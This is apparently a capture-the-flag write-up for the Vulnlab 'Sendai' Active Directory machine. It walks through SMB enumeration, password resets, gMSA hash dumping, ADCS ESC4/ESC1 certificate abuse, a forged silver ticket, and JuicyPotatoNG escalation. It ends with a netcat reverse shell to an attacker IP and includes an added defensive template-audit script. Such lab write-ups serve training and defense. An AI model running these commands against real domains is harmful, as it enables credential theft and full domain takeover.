Vulnlab — Sendai
Sendai involved enumerating usernames through SMB shares, finding users whose password had expired and resetting it, and then, through the Support group's GenericAll over the ADMSVC group, which in turn had ReadGMSAPassword on MGTSVC$, reading that gMSA's password. Enumerating the system then revealed clifford's password; he was part of the CA-Operators group, which had full control over the SendaiComputer template, making it vulnerable to ESC4. Changing the template's configuration made it vulnerable to ESC1, which led to domain admin.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown
PORT 80/443
Running gobuster, we can find /service
However, this endpoint shows that we don't have access to it.
PORT 445
Enumerating SMB shares with anonymous login, we'll see the config, sendai and Users shares. config was not accessible and Users didn't have anything, but sendai had some interesting files.
The incident mentioned that users had weak passwords and that all users will be prompted to change their password on logging in; the transfer directory had users' directories.
Resetting domain user’s password
These users can also be enumerated with lookupsid by brute-forcing SIDs.
On trying to log in with a null password, we'll get two users whose password needs to be changed.
Password can be changed with impacket-smbpasswd
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'
From the config share, we can grab .sqlconfig, which has credentials for MSSQL.
But this service isn't exposed to us, so moving on to enumerating the domain with BloodHound.
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41
Thomas.Powell is a member of the Support group, which has GenericAll on the ADMSVC group, which in turn has ReadGMSAPassword on the MGTSVC$ account. We'll need to add thomas to the ADMSVC group and then read the NT hash of the MGTSVC account.
Abusing GenericAll and reading GMSA password
Through bloodyAD we can add thomas to the ADMSVC group, since Support has GenericAll rights over it.
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell
With the gMSADumper script, or with netexec, we can dump the NT hash of the mgtsvc account.
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
This account can log in on the DC as it's part of the Remote Management group.
Checking the privileges after logging in through evil-winrm, the account doesn't have any privilege that we can abuse to get local admin.
Obtaining clifford’s password
Among the running processes there is a helpdesk process, which doesn't normally run on a system.
Enumerating the system with PrivescCheck.ps1
This lists the running processes, from which we'll find clifford.davey's creds.
Enumerating ADCS
This user belongs to the CA-Operators group, so he will likely be able to enroll in a custom template; enumerating templates with certipy
Escalating privileges through ESC4
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout
This lists a template, SendaiComputer, whose EKU is set to Client Authentication, so certificates from it can be used to authenticate to the domain. The CA-Operators group has full control over this template, which means we can edit it and impersonate the domain admin; this is known as ESC4 (access control) abuse.
With certipy, we can change the configuration of this template so that domain users can enroll in it and impersonate any user.
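To see which template attributes certipy is weighing here, the following is an added audit check (not part of the original writeup) that evaluates the ESC4 and ESC1 conditions from a template's LDAP attributes and ACL. The two template records are constructed to mirror the SendaiComputer story before and after the edit; the principal names and ACL shape are assumptions, while the attribute names and flag values are the real AD CS ones.

```python
# Added example, not from the original writeup: audit template attributes for
# the ESC4 (writable template) and ESC1 (enrollee supplies subject) conditions.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)
CLIENT_AUTH_OIDS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Everyone", "Authenticated Users", "Domain Users", "Domain Computers"}
WRITE_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "WriteProperty"}

def allows_client_auth(ekus):
    # An empty EKU list means "all purposes", which also covers client auth.
    return not ekus or bool(set(ekus) & CLIENT_AUTH_OIDS)

def audit_template(t, trusted=("Domain Admins", "Enterprise Admins")):
    """Return the sorted list of ESC findings for one template dict."""
    findings = set()
    acl = t["acl"]  # constructed shape: list of (principal, right) tuples
    enrollers = {p for p, r in acl if r == "Enroll"}
    writers = {p for p, r in acl if r in WRITE_RIGHTS}
    if (t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
            and not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and t["msPKI-RA-Signature"] == 0
            and allows_client_auth(t["pKIExtendedKeyUsage"])
            and enrollers & LOW_PRIV):
        findings.add("ESC1")
    if writers - set(trusted):   # a non-admin principal can rewrite the template
        findings.add("ESC4")
    return sorted(findings)

# Constructed: SendaiComputer as found, where CA-Operators has full control.
SENDAI_BEFORE = {
    "name": "SendaiComputer",
    "msPKI-Certificate-Name-Flag": 0,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "acl": [("Domain Admins", "GenericAll"), ("CA-Operators", "GenericAll"),
            ("CA-Operators", "Enroll")],
}
# Constructed: the same template after it is edited into an ESC1 shape.
SENDAI_AFTER = dict(SENDAI_BEFORE,
                    **{"msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT},
                    acl=SENDAI_BEFORE["acl"] + [("Domain Users", "Enroll")])

if __name__ == "__main__":
    for t in (SENDAI_BEFORE, SENDAI_AFTER):
        print(t["name"], audit_template(t) or "clean")
```

Running the same check periodically against live template objects, and alerting when a template gains a write-class ACE or the enrollee-supplies-subject flag, is the defensive counterpart of what certipy find reports.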
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl
Escalating with SeImpersonate privilege
Another way of escalating privileges is through MSSQL: since MSSQL is running internally, having access on the machine we can port forward with chisel.
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
But we'll get login denied for the sqlsvc account.
With ticketer, we forge a silver ticket for accessing the MSSQL service as Administrator.
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator
Enabling xp_cmdshell will allow us to execute system commands as sqlsvc.
The difference here is that we'll have the SeImpersonate privilege, which we can abuse to get local admin.
Using JuicyPotatoNG to abuse the privilege and get a shell as SYSTEM
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"